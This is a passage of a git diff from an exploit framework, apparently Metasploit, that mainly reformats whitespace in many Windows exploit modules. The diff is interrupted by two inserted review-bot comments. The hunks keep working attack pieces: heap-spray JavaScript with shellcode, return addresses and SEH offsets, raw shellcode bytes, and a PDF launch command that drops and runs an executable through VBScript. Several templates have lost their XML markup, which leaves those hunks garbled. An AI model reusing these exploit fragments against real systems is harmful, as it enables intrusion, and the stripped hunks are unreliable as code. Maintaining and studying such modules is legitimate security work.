@@ class Metasploit3 < Msf::Exploit::Remote SRC=\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X SRC=\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X > - ]]> + ]]> diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index 3336ce383a..3efa4d697e 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -1,5 +1,5 @@ ## -# $Id: novelliprint_getdriversettings.rb +# $Id: novelliprint_getdriversettings.rb$ ## ### diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb index 70e9b59b1c..b03c050f5f 100644 --- a/modules/exploits/windows/browser/persits_xupload_traversal.rb +++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb 
@@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Persits XUpload ActiveX MakeHttpRequest Directory Traversal', - 'Description' => %q{ + 'Name' => 'Persits XUpload ActiveX MakeHttpRequest Directory Traversal', + 'Description' => %q{ This module exploits a directory traversal in Persits Software Inc's XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5. By passing a string containing "..\\" sequences to the MakeHttpRequest method, diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb index 1c0690267b..51fbcd0c27 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb @@ -38,14 +38,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 2048, 'StackAdjustment' => -3500, }, - 'DefaultOptions' => + 'DefaultOptions' => { 'HTTP::compression' => 'gzip' }, 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DisclosureDate' => 'Sep 07 2009', 'DefaultTarget' => 0)) diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb index 22987d3115..e51652548d 100644 --- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb +++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DisclosureDate' => 'Jan 15 2009', 'DefaultTarget' => 0)) diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index 884af45b1f..ae0b529ff9 100644 
--- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 16 2008')) diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb index 1190ea3be4..ad96979209 100644 --- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb +++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ # Tested with ActiveX v2.0.0.1020 and v2.0.2008.801 - [ 'Windows Universal', + [ 'Windows Universal', { 'Ret' => 0x0c0c0c0c # heap sprayed # 0x746C15A9 # p/p/r in msls31.dll diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb index d904667b76..7c5a807514 100644 --- a/modules/exploits/windows/browser/verypdf_pdfview.rb +++ b/modules/exploits/windows/browser/verypdf_pdfview.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2008-5492'], + [ 'CVE', '2008-5492'], [ 'OSVDB', '49871'], [ 'BID','32313' ], ], diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index 735dd72cbf..ae9ce4aaa1 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ # Tested with atucfobj.dll v20.2008.2601.4928 - [ 'Windows Universal', { 'Ret' => 0x0c0c0c0c } ], + [ 'Windows Universal', { 'Ret' => 0x0c0c0c0c } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 06 2008')) 
diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index 82c63747dd..ec7d00ac95 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DisclosureDate' => 'May 29 2007', 'DefaultTarget' => 0)) diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index e554e9afbb..6212c64c43 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote # nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") + - rand_text(2, payload_badchars) + rand_text(2, payload_badchars) nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V') nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V') diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index 856b95ce90..cd5c9b5aed 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb 
@@ -105,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote # makes a long relative jump into the actual payload. # [ 'Windows Vista user32.dll 6.0.6000.16386', - { - 'Ret' => 0x700b, - 'Len' => 2, + { + 'Ret' => 0x700b, + 'Len' => 2, - # On Vista, the pages that contain the RIFF are read-only. - # In-place decoders cannot be used. - 'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw } - } + # On Vista, the pages that contain the RIFF are read-only. + # In-place decoders cannot be used. + 'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw } + } ], # diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index da6de82eef..c15c5514eb 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -63,12 +63,12 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) end - def exploit + def exploit ttf_data = make_ttf() js_data = make_js(payload.encoded) @@ -527,20 +527,13 @@ for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s"; xfa = <<-EOF - - - - 1 - - - - - + +1 + + EOF xref << pdf.length diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb index b947c2da10..fe47720cdf 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb @@ -72,12 +72,12 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) end - def exploit + def exploit swf_data = make_swf() js_data = make_js(payload.encoded) 
diff --git a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb index cf453b90f4..0485909a86 100644 --- a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 2726d67337..69775863b7 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb index e1f7d8f59d..58396eacc4 100644 --- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb +++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index 40b7e61902..fdc10751dc 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote return hex_payload end - def ioDef(id) + def ioDef(id) "%d 0 obj" % id end 
@@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote result end - def ASCIIHexWhitespaceEncode(str) + def ASCIIHexWhitespaceEncode(str) result = "" whitespace = "" str.each_byte do |b| @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote pdf << "f.SkipLine:Set w=CreateObject^(\"WScript.Shell\"^):Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\"%TEMP%\"^)+\"\\\\#{exe_name}\",2,True^):a=Split^(Trim^(Replace^(f.ReadLine,\"\\\\x\",\" \"^)^)^):" pdf << "for each x in a:g.Write^(Chr^(\"&h\" ^& x^)^):next:g.Close:f.Close > 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\#{exe_name} && del /F 1.vbs" pdf << eol << eol << eol << "#{launch_msg})" - pdf << ">>>>" << endobj + pdf << ">>>>" << endobj xref << pdf.length xrefPosition = pdf.length pdf << "xref" << eol diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index 2423c7a370..d7af0d8451 100644 --- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) 
@@ -166,67 +166,67 @@ Original notes on heap technique used in this exploit: ptrs_data << [(daddr+0x44)].pack('V') * 12 ptrs = Rex::Text.to_unescape(ptrs_data) - js_doc = %Q| - function prepareHoles(slide_size) - { - var size = 1000; - var xarr = new Array(size); - var hole = unescape("#{hole}"); - var pad = unescape("%u5858"); - while (pad.length <= slide_size/2 - hole.length) - pad += pad; - for (loop1=0; loop1 < size; loop1+=1) - { - ident = ""+loop1; + js_doc = <<-EOF +function prepareHoles(slide_size) +{ + var size = 1000; + var xarr = new Array(size); + var hole = unescape("#{hole}"); + var pad = unescape("%u5858"); + while (pad.length <= slide_size/2 - hole.length) + pad += pad; + for (loop1=0; loop1 < size; loop1+=1) + { + ident = ""+loop1; xarr[loop1]=hole + pad.substring(0,slide_size/2-hole.length); - } - for (loop2=0;loop2<100;loop2++) - { - for (loop1=size/2; loop1 < size-2; loop1+=2) + } + for (loop2=0;loop2<100;loop2++) + { + for (loop1=size/2; loop1 < size-2; loop1+=2) { - xarr[loop1]=null; - xarr[loop1]=pad.substring(0,0x10000/2 )+"A"; - xarr[loop1]=null; + xarr[loop1]=null; + xarr[loop1]=pad.substring(0,0x10000/2 )+"A"; + xarr[loop1]=null; } - } - return xarr; - } + } + return xarr; +} - function prepareMemory(size) - { - var mini_slide_size = 0x1000; - var slide_size = 0x100000; - var xarr = new Array(size); - var pad = unescape("%ucccc"); +function prepareMemory(size) +{ + var mini_slide_size = 0x1000; + var slide_size = 0x100000; + var xarr = new Array(size); + var pad = unescape("%ucccc"); - while (pad.length <= 32 ) - pad += pad; + while (pad.length <= 32 ) + pad += pad; - var nops = unescape("#{nops}"); - while (nops.length <= mini_slide_size/2 - nops.length) - nops += nops; + var nops = unescape("#{nops}"); + while (nops.length <= mini_slide_size/2 - nops.length) + nops += nops; - var shellcode = unescape("#{shellcode}"); - var pointers = unescape("#{ptrs}"); - var chunk = nops.substring(0,32/2) + pointers + + var shellcode = 
unescape("#{shellcode}"); + var pointers = unescape("#{ptrs}"); + var chunk = nops.substring(0,32/2) + pointers + nops.substring(0,mini_slide_size/2-pointers.length - shellcode.length - 32) + shellcode + pad.substring(0,32/2); - chunk=chunk.substring(0,mini_slide_size/2); - while (chunk.length <= slide_size/2) - chunk += chunk; + chunk=chunk.substring(0,mini_slide_size/2); + while (chunk.length <= slide_size/2) + chunk += chunk; - for (loop1=0; loop1 < size; loop1+=1) - { - ident = ""+loop1; + for (loop1=0; loop1 < size; loop1+=1) + { + ident = ""+loop1; xarr[loop1]=chunk.substring(16,slide_size/2 -32-ident.length)+ident; - } - return xarr; - } + } + return xarr; +} - var mem = prepareMemory(200); - var holes = prepareHoles(6500); - this.pageNum = 1; -| + var mem = prepareMemory(200); + var holes = prepareHoles(6500); + this.pageNum = 1; +EOF js_pg1 = %Q|this.print({bUI:true, bSilent:false, bShrinkToFit:false});| # Obfuscate it up a bit diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index 44ef267100..edd7ff41c5 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -68,25 +68,26 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - template = %Q| + template = <<-EOF + - - - + + + - -
- - <comment name="Comments" text="Comment" hint="Comment box" left="40" top="76" width="89" height="29" fontname="Times New Roman" fontsize="15" fontcolor="255" visible="1" fontstyle="0" /> - <exitbutton name="ButtonExit" image_path="" image_down_path="" text="Exit" hint="Exit this program" left="120" top="96" width="75" height="25" fontname="MS Sans Serif" fontsize="8" fontcolor="255" visible="1" fontstyle="0" /> +<main name="MainForm" image_path="" hint="" /> +<title name="Title" text="Title" hint="Title box" left="144" top="48" width="57" height="33" fontname="Times New Roman" fontsize="20" fontcolor="255" visible="1" fontstyle="0" /> +<comment name="Comments" text="Comment" hint="Comment box" left="40" top="76" width="89" height="29" fontname="Times New Roman" fontsize="15" fontcolor="255" visible="1" fontstyle="0" /> +<exitbutton name="ButtonExit" image_path="" image_down_path="" text="Exit" hint="Exit this program" left="120" top="96" width="75" height="25" fontname="MS Sans Serif" fontsize="8" fontcolor="255" visible="1" fontstyle="0" /> </autorun> </DeepBurner_record> -| +EOF seh_offset = 272 path = make_nops(seh_offset) diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index e494161ad9..bcd48e69a1 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -83,11 +83,11 @@ class Metasploit3 < Msf::Exploit::Remote # We utilize a small stub near the end of the buffer space to # continue to the real shellcode... # NOTE: the push is to avoid a badchar (0x5c) - stub = %Q| - push ecx - sub esp,-0x1a8 - ret - | + stub = <<-EOF +push ecx +sub esp,-0x1a8 +ret +EOF stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub).encode_string m3u[seh_offset - stub.length, stub.length] = stub 
diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index 5447060da9..1332f4fc9b 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), + OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), ], self.class) end diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index d3bcbb9457..b79be7c2a5 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -83,15 +83,15 @@ class Metasploit3 < Msf::Exploit::Remote template = %Q|<?xml version="1.0" encoding="UTF-8"?> <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> - <title>Playlist - - - REPLACE_ME - - 0 - - - +Playlist + + +REPLACE_ME + +0 + + + | diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index e384b432e3..923019d0b5 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote targs.each { |targ| print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...") - shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length) + shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length) email = rand_text_english(19) + [targ.ret].pack('V') + shellcode # Hopefully this structure is correct -- ported from msf 2. Blame me 
@@ -117,15 +117,15 @@ class Metasploit3 < Msf::Exploit::Remote [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') + # SRV_USER_ONLINE [5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') + - [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') + + [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') + # SRV_META_USER [5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') + - "\x00\x00\x0a" + # subcommand / success - "\x00\x00" + # nick length / nick - "\x00\x00" + # first length / first - "\x00\x00" + # last length / last - [email.length].pack('v') + email + - "\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x0a" + # subcommand / success + "\x00\x00" + # nick length / nick + "\x00\x00" + # first length / first + "\x00\x00" + # last length / last + [email.length].pack('v') + email + + "\x00\x00\x00\x00\x00\x00\x00" print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)") diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index e5b0e41582..12a02bc5e7 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -72,11 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote }, ], [ - 'Windows 2000 Pro SP4 French', - { - 'Platform' => 'win', - 'Ret' => 0x775F29D0, - }, + 'Windows 2000 Pro SP4 French', + { + 'Platform' => 'win', + 'Ret' => 0x775F29D0, + }, ], ], diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 1daa4db35d..ce9a05ed6d 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb 
@@ -38,11 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 1000, - 'BadChars' => "\x00\x20\x61\x62\x63\x64\x65\x66\x67\x68\x69" + - "\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74" + - "\x75\x76\x77\x78\x79\x7a", + 'BadChars' => "\x00\x20" + (0x61..0x7a).to_a.pack('C*'), 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", - }, 'Targets' => [ diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 4e3cac68d2..e8cb509808 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 26 2004', 'DefaultTarget' => 0)) - register_advanced_options( + register_advanced_options( [ OptInt.new('SEHOffset', [ false, "Offset from beginning of timezone to SEH", 47 ]), OptInt.new('ForceDoubling', [ false, "1 to force \\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect", 2 ]), diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index 0dbc140666..d8b910a861 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -84,9 +84,9 @@ class Metasploit3 < Msf::Exploit::Remote # [ 'vftpd 1.31 - Windows XP SP3 English', { + # call edi in vftpd.exe (v1.31) 'OldRet' => 0x405a73, # not used directly 'Ret' => 0x4058e3, # not used directly - # call edi in vftpd.exe (v1.31) 'Offset' => 16, # distance to saved return 'Adders' => "171,48" # adjust the bottom two bytes } diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index 37e5469957..5657084af5 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb 
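Review bot: The rewritten `'BadChars'` line in globalscapeftp_input.rb is byte-for-byte equivalent to the literal it replaces (`(0x61..0x7a).to_a.pack('C*')` yields exactly `\x61`..`\x7a`), but the computed range hides that the excluded bytes are the lowercase letters, which is the one fact an operator picking an encoder for this target needs to see at a glance. A trailing comment keeps it visible without undoing the cleanup: `'BadChars' => "\x00\x20" + (0x61..0x7a).to_a.pack('C*'), # NUL, space and lowercase a-z`. The enclosing `update_info` call starts before the hunk.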
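Review bot: Moving `# call edi in vftpd.exe (v1.31)` above `'OldRet'` in vermillion_ftpd_port.rb changes which address it appears to describe; it previously sat after `'Ret' => 0x4058e3`, and since both values carry the same `# not used directly` note a reader now has to guess whether the gadget is 0x405a73 or 0x4058e3. If it refers to `Ret`, I would attach it to that line, `'Ret' => 0x4058e3, # call edi in vftpd.exe (v1.31); not used directly`, and if it covers both values say so explicitly. The targets array is cut off at both ends of the hunk, so I cannot confirm which address the comment was originally written for.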
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(26000) - ], self.class) + ], self.class) end def exploit diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index 63f753bde3..1f65f54821 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2004-0608'], + [ 'CVE', '2004-0608'], [ 'OSVDB', '7217'], [ 'BID', '10570'], diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 2b3ce2c47e..18f004f32e 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => true, 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => - { + { 'BufferRegister' => 'ESP' }, }, diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index 830e98525d..10b3feb192 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote targ = targets[2] else raise RuntimeError, "Unable to determine a target automatically..." - # if snmp is running you could set the target based on community strings + # if snmp is running you could set the target based on community strings end end diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index 886cf976eb..f33f040d21 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb 
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), - ], self.class ) + ], self.class ) end def exploit diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index 32715765a6..510cbc40c6 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2006-4305'], - ['OSVDB', '28300'], + ['OSVDB', '28300'], ['BID', '19660'], ], 'DefaultOptions' => diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index f6bd1ebc47..1d7a61c605 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm', 'patrick' # MSF3 rewrite, ePO v2.5.1 target ], - 'Arch' => [ ARCH_X86 ], + 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index e8d304bc05..88437587eb 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -34,8 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2006-0992'], - ['OSVDB', '24617'], - ['BID', '17503'], + ['OSVDB', '24617'], + ['BID', '17503'], ], 'Privileged' => true, 'Payload' => diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index ef21f017ec..4112aaf641 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb 
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2003-0727'], - ['OSVDB', '2449'], + ['OSVDB', '2449'], ['BID', '8375'], ['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'], ], diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 8de0d3bb15..01f7cdb652 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2006-1148'], - ['OSVDB', '23777'], + ['OSVDB', '23777'], ['BID', '17040'], ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], ], diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index 2e01659447..5ac8400563 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote req << "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59" # Alphanumeric jmp back (edx context) - req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41" + req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41" req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50" req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57" req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a" diff --git 